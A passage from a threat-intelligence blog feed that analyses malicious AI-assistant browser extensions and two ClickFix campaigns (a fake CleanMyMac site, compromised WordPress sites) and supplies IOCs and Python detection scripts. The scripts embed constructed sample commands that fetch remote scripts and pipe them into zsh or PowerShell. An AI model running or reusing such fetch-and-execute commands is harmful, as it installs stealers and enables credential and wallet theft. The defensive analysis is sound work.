<p>We are currently <strong>blocking access</strong> to <code>chataigpt[.]pro</code> and <code>chatgptsidebar[.]pro</code> to prevent the installation of the malicious extensions and the subsequent exfiltration of sensitive data. If your security telemetry detects interactions with these domains, it should be treated as an indicator of a compromised browser environment.</p>
<h2>Recommendations</h2>
<p>Defenders and SOC analysts must adapt their strategies to address the unique risks of AI-integrated browser extensions. The following measures are recommended to mitigate the risk of this campaign and similar future threats:</p>
<ol>
<li><p><strong>Audit Browser Extensions:</strong> Conduct a sweep of all Chromium-based browsers (Chrome, Edge, Brave) within the enterprise. Remove any extensions that mimic AI assistants but are not officially sanctioned by the IT department.</p>
</li>
<li><p><strong>Restrict Extension Permissions:</strong> Apply least privilege to extension permissions. An extension should request only what it needs to do its job. If a simple translation tool asks for "Read and change all your data on the sites you visit" (the prompt for <code>&lt;all_urls&gt;</code> host access, which is what lets a content script read any page's DOM and <code>localStorage</code>), reject it. Managed Chromium browsers can enforce this centrally through the <code>ExtensionSettings</code> policy, which supports both an install allowlist and per-extension blocked permissions.</p>
</li>
<li><p><strong>Monitor for Agentic Browser Behavior:</strong> As agentic browsers become more prevalent, monitor for the automatic installation of unknown extensions. Implement automated checks to ensure only whitelisted extensions are permitted.</p>
</li>
<li><p><strong>Inspect Extension Metadata:</strong> Before installation, inspect the developer ID and publisher details. Malicious actors often use names that are close to, but not identical to, legitimate vendors.</p>
</li>
<li><p><strong>Monitor LLM Traffic:</strong> While difficult to fully block, monitoring outbound traffic to AI chat platforms can help identify unusual patterns that might indicate data exfiltration, though filtering this traffic requires careful consideration to avoid blocking legitimate developer work.</p>
</li>
</ol>
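<p>Recommendations 1 and 2 amount to an audit of installed extension manifests, and that audit can be scripted. The following Python is an added example, not code from Microsoft's report or from SecLookup: it walks a Chromium profile's <code>Extensions</code> directory, reads each <code>manifest.json</code>, and flags unsanctioned extensions that combine all-sites host access, tab enumeration, content scripts aimed at LLM chat front-ends, or an AI-assistant style name. The two manifests it audits are constructed; the name hints, the LLM host list and the sanctioned-ID set are assumptions to tune for your own estate.</p>

```python
import json
import tempfile
from pathlib import Path

# Host patterns that grant a content script access to every site, i.e. the
# "Read and change all your data on the sites you visit" prompt.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Name fragments typical of the impersonated tools (assumption; tune per estate).
AI_NAME_HINTS = ("chatgpt", "gpt", "ai assistant", "ai sidebar", "copilot", "deepseek")
# LLM chat front-ends such an extension would want to read (assumption).
LLM_HOSTS = ("chatgpt.com", "chat.openai.com", "chat.deepseek.com")


def assess_manifest(manifest: dict) -> list:
    """Return the reasons an extension manifest deserves a closer look (empty list = none)."""
    reasons = []
    name = str(manifest.get("name", "")).lower()  # note: may be a __MSG_...__ locale key
    perms = set(manifest.get("permissions", []))
    # MV2 kept host patterns in "permissions"; MV3 moved them to "host_permissions".
    hosts = set(manifest.get("host_permissions", [])) | {p for p in perms if "://" in p or p == "<all_urls>"}
    for script in manifest.get("content_scripts", []):
        hosts |= set(script.get("matches", []))
    if hosts & BROAD_HOST_PATTERNS:
        reasons.append("broad host access (<all_urls> or equivalent)")
    if any(h in pattern for pattern in hosts for h in LLM_HOSTS):
        reasons.append("content-script reach into LLM chat front-ends")
    if "tabs" in perms or "webNavigation" in perms:
        reasons.append("can enumerate tab URLs (tabs/webNavigation)")
    if any(h in name for h in AI_NAME_HINTS):
        reasons.append("AI-assistant style name")
    return reasons


def audit_extensions_dir(root, sanctioned_ids=frozenset()) -> dict:
    """Walk a Chromium profile's Extensions/<id>/<version>/manifest.json tree.

    Returns {extension_id: reasons} for every unsanctioned extension that tripped a check.
    """
    findings = {}
    for manifest_path in Path(root).rglob("manifest.json"):
        ext_id = manifest_path.parent.parent.name  # Extensions/<id>/<version>/manifest.json
        if ext_id in sanctioned_ids:
            continue
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            findings[ext_id] = ["unreadable manifest"]
            continue
        reasons = assess_manifest(manifest)
        if reasons:
            findings[ext_id] = reasons
    return findings


# Constructed sample profile: a harmless translator and an all-sites "AI sidebar".
SAMPLE_MANIFESTS = {
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": {
        "manifest_version": 3, "name": "Quick Translate", "version": "1.0",
        "permissions": ["contextMenus"], "host_permissions": ["https://translate.example.com/*"],
    },
    "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": {
        "manifest_version": 3, "name": "ChatGPT AI Sidebar Pro", "version": "2.3",
        "permissions": ["tabs", "storage"], "host_permissions": ["<all_urls>"],
        "content_scripts": [{"matches": ["https://chatgpt.com/*", "https://chat.deepseek.com/*"], "js": ["c.js"]}],
    },
}


def run_demo() -> dict:
    """Write the constructed manifests into a temporary profile layout and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        for ext_id, manifest in SAMPLE_MANIFESTS.items():
            d = Path(tmp) / "Extensions" / ext_id / "1.0_0"
            d.mkdir(parents=True)
            (d / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
        return audit_extensions_dir(tmp)


if __name__ == "__main__":
    for ext_id, reasons in run_demo().items():
        print(ext_id, "->", "; ".join(reasons))
```

<p>On a real machine, point <code>audit_extensions_dir</code> at the profile's <code>Extensions</code> folder (for example <code>~/.config/google-chrome/Default/Extensions</code> on Linux) and pass the IDs of sanctioned extensions so they are skipped; everything else with a non-empty reason list is a candidate for removal or for a closer look at its background script.</p>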
<h2>References</h2>
<ul>
<li><strong>Malicious AI Assistant Extensions Harvest LLM Chat Histories</strong> by Microsoft Defender Security Research Team, Microsoft Security Blog, March 5, 2026. <a href="https://www.microsoft.com/en-us/security/blog/2026/03/05/malicious-ai-assistant-extensions-harvest-llm-chat-histories/">Link</a></li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Deceptive "CleanMyMac" Site Delivers SHub Stealer and Crypto Wallet Backdoors via ClickFix Technique]]></title><description><![CDATA[Executive Summary
Security researchers have identified a sophisticated social engineering campaign targeting macOS users impersonating the popular system utility, CleanMyMac. The attackers have deploy]]></description><link>https://blog.seclookup.com/deceptive-cleanmymac-site-delivers-shub-stealer-and-crypto-wallet-backdoors-via-clickfix-technique</link><guid isPermaLink="true">https://blog.seclookup.com/deceptive-cleanmymac-site-delivers-shub-stealer-and-crypto-wallet-backdoors-via-clickfix-technique</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Sat, 14 Mar 2026 08:56:43 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/b9e8a865-7fc4-420f-ac08-5e3b3275d0b0.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>Security researchers have identified a sophisticated social engineering campaign targeting macOS users impersonating the popular system utility, CleanMyMac. The attackers have deployed a deceptive website (<code>cleanmymacos[.]org</code>) that mimics the legitimate product page to lure users into executing a malicious shell script. This campaign utilizes the "ClickFix" technique, a method that bypasses traditional email or attachment-based delivery by tricking users into pasting commands directly into their Terminal application. Once executed, the payload installs SHub Stealer, a potent macOS infostealer capable of harvesting sensitive credentials, including Apple Keychain data, browser autofill information, and, critically, cryptocurrency wallet credentials. This analysis details the TTPs used by the threat actor and provides IOCs to help organizations defend against this evolving threat.</p>
<h2>Threat Analysis</h2>
<h3>Impersonation and Social Engineering</h3>
<p>The attack begins with a high-fidelity impersonation of the CleanMyMac product page. The domain <code>cleanmymacos[.]org</code> is designed to look nearly identical to the official MacPaw website. The landing page presents a "fake" advanced installation option, a psychological trigger often used to bypass security skepticism among "power users" who believe they are upgrading their system configuration.</p>
<h3>The ClickFix Delivery Mechanism</h3>
<p>Unlike traditional malware delivery via email attachments or drive-by downloads, this campaign relies on user interaction within the operating system shell. The victim is instructed to open the Terminal application and paste a specific command string. This technique, known as ClickFix, has become increasingly prevalent among macOS threat actors because it is difficult for automated defenses to block without false positives, as the user is voluntarily running code.</p>
<h3>Technical Execution Chain</h3>
<p>Upon pasting the command into Terminal, the execution chain proceeds rapidly:</p>
<ol>
<li><p><strong>Legitimacy Layer:</strong> The first step of the script is to print a reassuring line of text: <code>macOS-CleanMyMac-App: https://macpaw.com/cleanmymac/us/app</code>. This mimics the output of a legitimate script, creating a false sense of security and confirming to the user that the script is related to the official software.</p>
</li>
<li><p><strong>Decoding Layer:</strong> Following the echo command, the script decodes a Base64-encoded link. This obfuscation hides the true destination of the download, preventing basic URL filtering from catching the malicious payload.</p>
</li>
<li><p><strong>Execution Layer:</strong> The script downloads a shell script from the attacker’s server and pipes it directly into <code>zsh</code> (Z Shell) for immediate execution. This bypasses the need for the user to save a file to disk first, making the process feel instantaneous and seamless.</p>
</li>
</ol>
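<p>The three layers above leave a recognisable shape in a pasted command line, which is what EDR process telemetry or a shell history will record. The following Python is an added example, not the campaign's script and not code from Malwarebytes or SecLookup: it decodes any Base64 run in a command, surfaces URLs hidden that way, and flags fetch-and-pipe-into-shell constructions. The command string it analyses is constructed to have the same shape (decoy echo, Base64-hidden URL, download piped into <code>zsh</code>); the hidden URL points at a reserved <code>.invalid</code> hostname, not the real staging server.</p>

```python
import base64
import binascii
import re

# Hypothetical second-stage URL on a reserved .invalid name; not the campaign's real server.
PAYLOAD_URL = "https://stage.example.invalid/install.sh"
_B64_URL = base64.b64encode(PAYLOAD_URL.encode()).decode()

# Constructed stand-in for the pasted command. Same shape as the report describes
# (decoy echo, Base64-hidden URL, fetch piped into zsh); not the actual campaign string.
SAMPLE_COMMAND = (
    "echo 'macOS-CleanMyMac-App: https://macpaw.com/cleanmymac/us/app'; "
    f'curl -fsSL "$(echo {_B64_URL} | base64 --decode)" | zsh'
)

B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z|k|da)?sh\b")
FETCH_RE = re.compile(r"\b(?:curl|wget)\b")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def decode_embedded_base64(text: str) -> list:
    """Decode every Base64-looking run in text; keep only ones that decode to printable text."""
    out = []
    for blob in B64_RUN_RE.findall(text):
        try:
            s = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # e.g. a URL path that merely looks like Base64 fails padding or decoding
        if s.isprintable():
            out.append(s)
    return out


def triage_command(cmd: str) -> dict:
    """Score one command line for the ClickFix pattern: decoy output, hidden URL, pipe to shell."""
    decoded = decode_embedded_base64(cmd)
    hidden_urls = [u for s in decoded for u in URL_RE.findall(s)]
    visible_urls = URL_RE.findall(cmd)
    pipe_to_shell = bool(PIPE_TO_SHELL_RE.search(cmd))
    fetch = bool(FETCH_RE.search(cmd))
    reasons = []
    if fetch and pipe_to_shell:
        reasons.append("remote content piped straight into a shell")
    if hidden_urls:
        reasons.append("URL hidden behind Base64")
    if hidden_urls and visible_urls:
        reasons.append("decoy URL printed while a different URL is fetched")
    return {
        "pipe_to_shell": pipe_to_shell,
        "visible_urls": visible_urls,
        "hidden_urls": hidden_urls,
        "reasons": reasons,
        "verdict": "clickfix-like" if reasons else "no finding",
    }


if __name__ == "__main__":
    result = triage_command(SAMPLE_COMMAND)
    print(result["verdict"], "|", "; ".join(result["reasons"]))
    for url in result["hidden_urls"]:
        print("hidden URL:", url)
```

<p>The decisive signal is the combination: a visible, reputable URL in the output and a different, decoded URL in the fetch. Either alone has benign uses (installers do pipe to shell; Base64 does appear in legitimate one-liners), so the function reports the reasons rather than a single boolean and leaves the threshold to the analyst.</p>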
<h3>SHub Stealer Capabilities</h3>
<p>The payload delivered by this script is SHub Stealer. This malware is designed not just for generic data exfiltration but with a specific focus on high-value assets:</p>
<ul>
<li><p><strong>Credential Harvesting:</strong> It targets saved passwords and browser data.</p>
</li>
<li><p><strong>Apple Keychain Access:</strong> It attempts to extract secrets stored in the system-wide keychain, which often contains credentials for accounts the user has authorized.</p>
</li>
<li><p><strong>Cryptocurrency Wallet Backdoors:</strong> Perhaps the most dangerous capability mentioned in the report is the malware's ability to modify crypto wallet applications, such as Exodus, Atomic Wallet, Ledger Wallet, and Ledger Live. By injecting itself into these processes, the malware can intercept or steal the wallet’s recovery phrase (seed phrase), effectively granting attackers control over the victim's cryptocurrency funds.</p>
</li>
<li><p><strong>Telegram Session Hijacking:</strong> The stealer also targets Telegram sessions, allowing attackers to potentially access private communications or accounts.</p>
</li>
</ul>
<h3>MITRE ATT&amp;CK Framework Mapping</h3>
<p>This campaign aligns with several techniques observed in the MITRE ATT&amp;CK framework:</p>
<ul>
<li><p><strong>T1583.001 (Acquire Infrastructure: Domains) and T1036 (Masquerading):</strong> The lookalike <code>cleanmymacos[.]org</code> domain and the cloned product page.</p>
</li>
<li><p><strong>T1204.004 (User Execution: Malicious Copy and Paste):</strong> The ClickFix step itself; the victim pastes the command into Terminal.</p>
</li>
<li><p><strong>T1059.004 (Command and Scripting Interpreter: Unix Shell):</strong> Execution of the pasted command and of the downloaded script under <code>zsh</code>.</p>
</li>
<li><p><strong>T1105 (Ingress Tool Transfer) and T1027 (Obfuscated Files or Information):</strong> The second-stage script is fetched from the attacker's server, with its URL hidden behind Base64 encoding.</p>
</li>
<li><p><strong>T1555.001 (Credentials from Password Stores: Keychain):</strong> Extraction of secrets from the Apple Keychain.</p>
</li>
<li><p><strong>T1554 (Compromise Host Software Binary):</strong> Modification of the installed wallet applications so that they leak recovery phrases to the attacker.</p>
</li>
</ul>
<h2>Indicators of Compromise (IOCs)</h2>
<p>SecLookup has analyzed the domains mentioned in the report and confirmed malicious status. Below are the relevant indicators for your threat hunting and detection systems.</p>
<h3>Domains</h3>
<pre><code class="language-text">cleanmymacos[.]org
wallets-gate[.]io
</code></pre>
<h3>URLs</h3>
<pre><code class="language-text">https://macpaw[.]com/cleanmymac/us/app
</code></pre>
<p><em>(Note: This URL is legitimate and used by the attackers for deception; do not block the legitimate domain, but monitor for references to it.)</em></p>
<h3>Email Addresses</h3>
<pre><code class="language-text">command-and-controlserver@res2erch-sl0ut.com
attackbegins@cleanmymacos.org
</code></pre>
<h3>Detailed Domain Intelligence (SecLookup Scan Results)</h3>
<p>SecLookup scan results: <strong>cleanmymacos.org</strong>, <strong>wallets-gate.io</strong></p>
<h2>SecLookup Detection</h2>
<p>SecLookup’s Threat Intelligence platform has been actively monitoring this campaign. Our systems have confirmed that the domains <code>cleanmymacos.org</code> and <code>wallets-gate.io</code> are malicious and have been blocked for SecLookup users.</p>
<h2>Recommendations</h2>
<p>To mitigate the risk of this and similar ClickFix campaigns, we recommend the following security best practices:</p>
<ol>
<li><p><strong>Strict Software Procurement Policy:</strong> Remind users that legitimate software, including popular utilities like CleanMyMac, is distributed via the official MacPaw website or the Apple App Store. <strong>Legitimate applications should never require users to paste commands into Terminal to install them.</strong></p>
</li>
<li><p><strong>Terminal Awareness Training:</strong> Educate staff and power users about the dangers of the ClickFix technique. If a website prompts you to open Terminal and paste a command, pause and verify the source. A simple Google search for the command string can often reveal if it is malicious.</p>
</li>
<li><p><strong>Crypto Wallet Vigilance:</strong> For users holding cryptocurrency, pay special attention to the security of their wallet applications. If a legitimate app (like Exodus or Ledger Live) suddenly starts behaving erratically or prompts for frequent updates or "recovery phrase" verifications, it may be compromised.</p>
</li>
<li><p><strong>Egress and Endpoint Controls:</strong> The chain needs two things a managed Mac can deny it: an outbound fetch of the second-stage script and a shell that will run it. DNS or proxy blocking of the IOC domains removes the first; EDR rules that alert when <code>curl</code> output or a <code>base64 --decode</code> result is piped straight into <code>zsh</code> or <code>bash</code> from a Terminal session catch the second.</p>
</li>
</ol>
<h2>References</h2>
<ul>
<li><a href="https://www.malwarebytes.com/blog/threat-intel/2026/03/fake-cleanmymac-site-installs-shub-stealer-and-backdoors-crypto-wallets">Fake CleanMyMac site installs SHub Stealer and backdoors crypto wallets</a>, Malwarebytes Labs.</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[The Fake Cloudflare Lure: A Global WordPress Compromise Leading to Credential Theft]]></title><description><![CDATA[Executive Summary
The digital landscape is rife with sophisticated threats, but few are as insidious as the compromise of legitimate infrastructure. In a recent alarming discovery by Rapid7 Labs, we h]]></description><link>https://blog.seclookup.com/the-fake-cloudflare-lure-a-global-wordpress-compromise-leading-to-credential-theft</link><guid isPermaLink="true">https://blog.seclookup.com/the-fake-cloudflare-lure-a-global-wordpress-compromise-leading-to-credential-theft</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Wed, 11 Mar 2026 13:01:46 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/00ac3988-2add-4169-9cff-ff91555b6677.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>Few threats are as hard to spot as the compromise of legitimate infrastructure. Rapid7 Labs has identified a widespread campaign compromising legitimate, high-trust WordPress websites worldwide. Active since December 2025, it injects a "ClickFix" implant that impersonates a Cloudflare human-verification challenge, trading on the trust visitors place in both the site and the Cloudflare brand.</p>
<p>The objective is theft of credentials and cryptocurrency wallets from Windows systems. Infected sites include regional news outlets, local businesses, and the official webpage of a United States Senate candidate, which shows both the reach and the indiscriminate nature of the compromise. SecLookup's threat intelligence platform has been detecting and blocking the associated infrastructure. This post walks through the infection chain, the TTPs, and the indicators of compromise (IOCs).</p>
<h2>Threat Analysis</h2>
<p>Given the scale and the specific interest in wallets and credentials, the operator is likely an affiliate of a larger credential-stealing operation. The playbook has two parts: <strong>compromise of third-party web servers</strong> (the WordPress sites, which become the delivery infrastructure) followed by <strong>social engineering</strong> of their visitors.</p>
<h3>The Lure: Impersonating Security</h3>
<p>The most deceptive aspect of this attack is the user interface. The malicious script mimics a standard Cloudflare challenge page. When a visitor lands on a compromised site, they are presented with a popup claiming a security check is required.</p>
<pre><code class="language-text">[Browser Popup]
"Please wait while we check your browser..."
[Button] "Check my browser"
</code></pre>
<p>This "ClickFix" technique relies on the visitor's wish to get past the check and reach the site. Clicking the button verifies nothing; in the ClickFix pattern it places a command on the clipboard, and the page then instructs the visitor to "complete verification" by opening the Run dialog (Win+R) and pasting it. Every step from there is carried out by the user's own hands, which is what lets the chain slip past controls that watch for downloads.</p>
<h3>The Infection Chain</h3>
<p>The chain is built to leave as little on disk as possible, which is why file-based antivirus (AV) gets little purchase on it. The stages follow the usual ClickFix pattern:</p>
<ol>
<li><p><strong>Obfuscated JavaScript:</strong> The implant injected into the WordPress site loads an obfuscated JavaScript file from a remote server; this script renders the fake challenge and stages the command the victim is told to paste.</p>
</li>
<li><p><strong>PowerShell Stagers:</strong> The pasted command runs PowerShell, which downloads and runs the next stage. The browser never executes PowerShell itself; the user does, via the Run dialog.</p>
</li>
<li><p><strong>In-Memory Shellcode:</strong> The final payload arrives as raw shellcode and is injected into an inconspicuous Windows process (such as <code>explorer.exe</code> or <code>svchost.exe</code>). No payload file is written, so file-creation and on-access scanning see nothing; process-creation and injection telemetry is where the chain becomes visible.</p>
</li>
</ol>
<h3>MITRE ATT&amp;CK Mapping</h3>
<p>This campaign maps to several key techniques in the MITRE ATT&amp;CK framework:</p>
<ul>
<li><p><strong>T1584.004 (Compromise Infrastructure: Server) and T1189 (Drive-by Compromise):</strong> Legitimate WordPress sites are compromised and turned into delivery infrastructure; victims arrive simply by visiting them.</p>
</li>
<li><p><strong>T1204.004 (User Execution: Malicious Copy and Paste):</strong> The ClickFix step that turns a page visit into code execution.</p>
</li>
<li><p><strong>T1059.001 (Command and Scripting Interpreter: PowerShell):</strong> Staging and execution of the later stages.</p>
</li>
<li><p><strong>T1027 (Obfuscated Files or Information):</strong> The JavaScript implant is heavily obfuscated to defeat static analysis.</p>
</li>
<li><p><strong>T1055 (Process Injection):</strong> Shellcode injected into legitimate processes.</p>
</li>
<li><p><strong>T1555.003 (Credentials from Password Stores: Credentials from Web Browsers) and T1005 (Data from Local System):</strong> Harvesting of saved browser credentials and wallet data from the victim's profile and disk.</p>
</li>
</li>
</ul>
<p>Because the hosting domain is legitimate, reputation-based blocking of the initial page is useless; detection has to come from behaviour on the endpoint. The tells are PowerShell launched by <code>explorer.exe</code> (the Run dialog's parent) with hidden-window or encoded-command flags shortly after browser activity, any script interpreter spawned directly by a browser, and injection into <code>explorer.exe</code> or <code>svchost.exe</code>.</p>
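<p>The lineage and command-line tells just described can be expressed as a rule over process-creation events. The following Python is an added example, not code from Rapid7 or SecLookup: it evaluates Sysmon-style process-creation records, keeps only interpreters whose parent is <code>explorer.exe</code> or a browser, scores the command line for hidden-window, encoded-command and download-and-run markers, and decodes <code>-EncodedCommand</code> payloads (Base64 of UTF-16LE) to surface the staging URL. The four events are constructed; the stager text and its <code>.invalid</code> host are hypothetical, with only the <code>/jsrepo?rnd=</code> path shape taken from this report's URL IOCs.</p>

```python
import base64
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# ClickFix pastes go into the Win+R Run dialog, whose parent is explorer.exe, so the
# interpreter's parent is the shell rather than the browser. Both lineages are in scope.
LAUNCHERS = BROWSERS | {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}

# PowerShell accepts unambiguous prefixes of -EncodedCommand; the common ones are listed.
ENC_RE = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")
SUSPICIOUS = [
    (re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b"), "hidden window"),
    (ENC_RE, "encoded command"),
    (re.compile(r"(?i)\b(?:iex|invoke-expression|downloadstring|invoke-webrequest|iwr)\b"), "download-and-run"),
    (re.compile(r"(?i)\bmshta\b.*https?://"), "mshta with remote URL"),
]
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def encode_powershell(cmd: str) -> str:
    """PowerShell -EncodedCommand takes Base64 of the UTF-16LE command text."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()


def decode_encoded_command(cmdline: str) -> str:
    """Recover the plaintext behind -enc/-EncodedCommand, or "" if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate_event(ev: dict):
    """Return a finding for one process-creation event, or None if it is not interesting."""
    parent, image = _basename(ev["parent_image"]), _basename(ev["image"])
    if parent not in LAUNCHERS or image not in INTERPRETERS:
        return None
    cmd = ev.get("command_line", "")
    decoded = decode_encoded_command(cmd)
    reasons = [label for rx, label in SUSPICIOUS if rx.search(cmd) or (decoded and rx.search(decoded))]
    if parent in BROWSERS:
        reasons.append("interpreter spawned directly by a browser")
    if not reasons:
        return None
    return {
        "pid": ev["pid"],
        "parent": parent,
        "image": image,
        "reasons": reasons,
        "urls": URL_RE.findall(cmd) + URL_RE.findall(decoded),
        "decoded": decoded,
    }


def scan_events(events: list) -> list:
    return [f for f in (evaluate_event(e) for e in events) if f]


# Constructed stager text; the host is a reserved .invalid name, the path mimics the
# /jsrepo?rnd= pattern in this report's URL IOCs.
STAGER = "iex (iwr 'https://stager.example.invalid/jsrepo?rnd=4811' -UseBasicParsing).Content"

# Constructed process-creation events in a Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -nop -enc " + encode_powershell(STAGER)},
    {"pid": 4188, "parent_image": r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://lure.example.invalid/verify.hta"},
    {"pid": 4201, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},  # a user opening a console: nothing to flag
    {"pid": 4250, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -enc " + encode_powershell("Get-Date")},  # outside this rule's lineage
]


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {f['parent']} -> {f['image']}: {'; '.join(f['reasons'])}")
        for u in f["urls"]:
            print("   url:", u)
```

<p>The rule deliberately ignores the fourth event (an encoded command under <code>svchost.exe</code>) because that lineage belongs to a different detection, scheduled tasks and services, not to ClickFix. A bare <code>powershell.exe</code> under <code>explorer.exe</code> is also left alone, since that is simply a user opening a console; it is the flags and the decoded content that carry the signal.</p>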
<h2>Indicators of Compromise (IOCs)</h2>
<p>SecLookup has aggregated the following IOCs based on the Rapid7 research and our own telemetry. All domains listed below have been confirmed malicious and are currently blocked by SecLookup.</p>
<h3>Malicious Domains</h3>
<p>The following domains were hosting the malicious JavaScript implants and the fake CAPTCHA lures.</p>
<pre><code class="language-text">wepro.ch
goveanrs.org
namzcp.org
surveygifts.org
beta-charts.org
govearali.org
getalib.org
</code></pre>
<h3>IP Addresses</h3>
<p>The infrastructure associated with this campaign utilizes the following IP addresses to serve the malicious payloads and redirect traffic.</p>
<pre><code class="language-text">91.92.240.219
172.94.9.187
94.154.35.115
178.16.53.70
94.154.35.152
</code></pre>
<h3>Malicious URLs</h3>
<p>Users were redirected to the following URLs to download the payloads. Note the use of <code>jsrepo</code> parameters often seen in script injection attacks.</p>
<h3>Detection Pattern</h3>
<p>Security teams can use the following regex pattern to identify attempts to access legitimate WordPress administrative paths, which may be abused by this actor to ensure the infected site remains accessible or to exfiltrate data:</p>
<pre><code class="language-text">wp-login.php|wp-cron.php|xmlrpc.php|wp-admin|wp-includes|wp-content|\?feed=|\/feed|wp-json|\?wc-ajax|.css|.js|.ico|.png|.gif|.bmp|.jpe?g|.tiff|.mp[34g]|.wmv|.zip|.rar|.exe|.pdf|.txt|sitemap.*.xml|robots.txt
</code></pre>
<h2>SecLookup Detection</h2>
<p>SecLookup maintains a proactive threat intelligence platform designed to identify and neutralize threats before they impact our users. In response to the findings detailed by Rapid7 Labs, SecLookup has immediately updated its threat feed to block the domains and IP addresses identified above.</p>
<h2>Recommendations</h2>
<p>To defend against this sophisticated credential-stealing campaign, organizations should implement the following measures:</p>
<ol>
<li><p><strong>Browser and System Hygiene:</strong> Ensure that browsers and operating systems are fully patched. Malware targeting digital wallets often exploits vulnerabilities in browser extensions or the browser itself.</p>
</li>
<li><p><strong>Verify CAPTCHAs:</strong> Be skeptical of any CAPTCHA popups. If a site forces you to click a "Check my browser" button to proceed, close the tab immediately. Legitimate CAPTCHAs (like Cloudflare's) typically appear directly on the page without the address bar changing or requiring a new click to load content.</p>
</li>
<li><p><strong>Endpoint Detection and Response (EDR):</strong> Since the malware executes in-memory, relying on traditional antivirus is insufficient. Ensure your EDR solution is configured to monitor for PowerShell execution and process injection events originating from browser processes.</p>
</li>
<li><p><strong>Web Application Firewall (WAF):</strong> Implement strict WAF rules to block known malicious patterns and obfuscated JavaScript injection attempts on WordPress sites.</p>
</li>
<li><p><strong>User Awareness:</strong> Train users to recognize that a "security check" popup is not a standard part of web browsing and should be ignored.</p>
</li>
</ol>
<h2>References</h2>
<ul>
<li><a href="https://www.rapid7.com/blog/post/tr-malicious-websites-wordpress-compromise-advances-global-stealer-operation"><strong>When Trusted Websites Turn Malicious: WordPress Compromises Advance Global Stealer Operation</strong></a> by Milan Spinka, Rapid7 Blog (Published March 10, 2026)</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[The Rise of Tycoon2FA: Analyzing the Largest AiTM Phishing-as-a-Service Platform]]></title><description><![CDATA[Executive Summary
The cybercriminal ecosystem is defined by the rapid commoditization of attack tools. The emergence of Tycoon2FA in August 2023 marked a significant shift in the landscape of credenti]]></description><link>https://blog.seclookup.com/the-rise-of-tycoon2fa-analyzing-the-largest-aitm-phishing-as-a-service-platform</link><guid isPermaLink="true">https://blog.seclookup.com/the-rise-of-tycoon2fa-analyzing-the-largest-aitm-phishing-as-a-service-platform</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Wed, 11 Mar 2026 13:00:12 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/99e910e5-0469-4e3e-93e4-5ed8ba3c7bdf.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Executive Summary</strong></p>
<p>The cybercriminal ecosystem is defined by the rapid commoditization of attack tools. The emergence of Tycoon2FA in August 2023 marked a significant shift in the landscape of credential theft. Developed and operated by the threat actor tracked by Microsoft as <strong>Storm-1747</strong>, Tycoon2FA rapidly ascended to become one of the most widespread Phishing-as-a-Service (PhaaS) platforms in operation.</p>
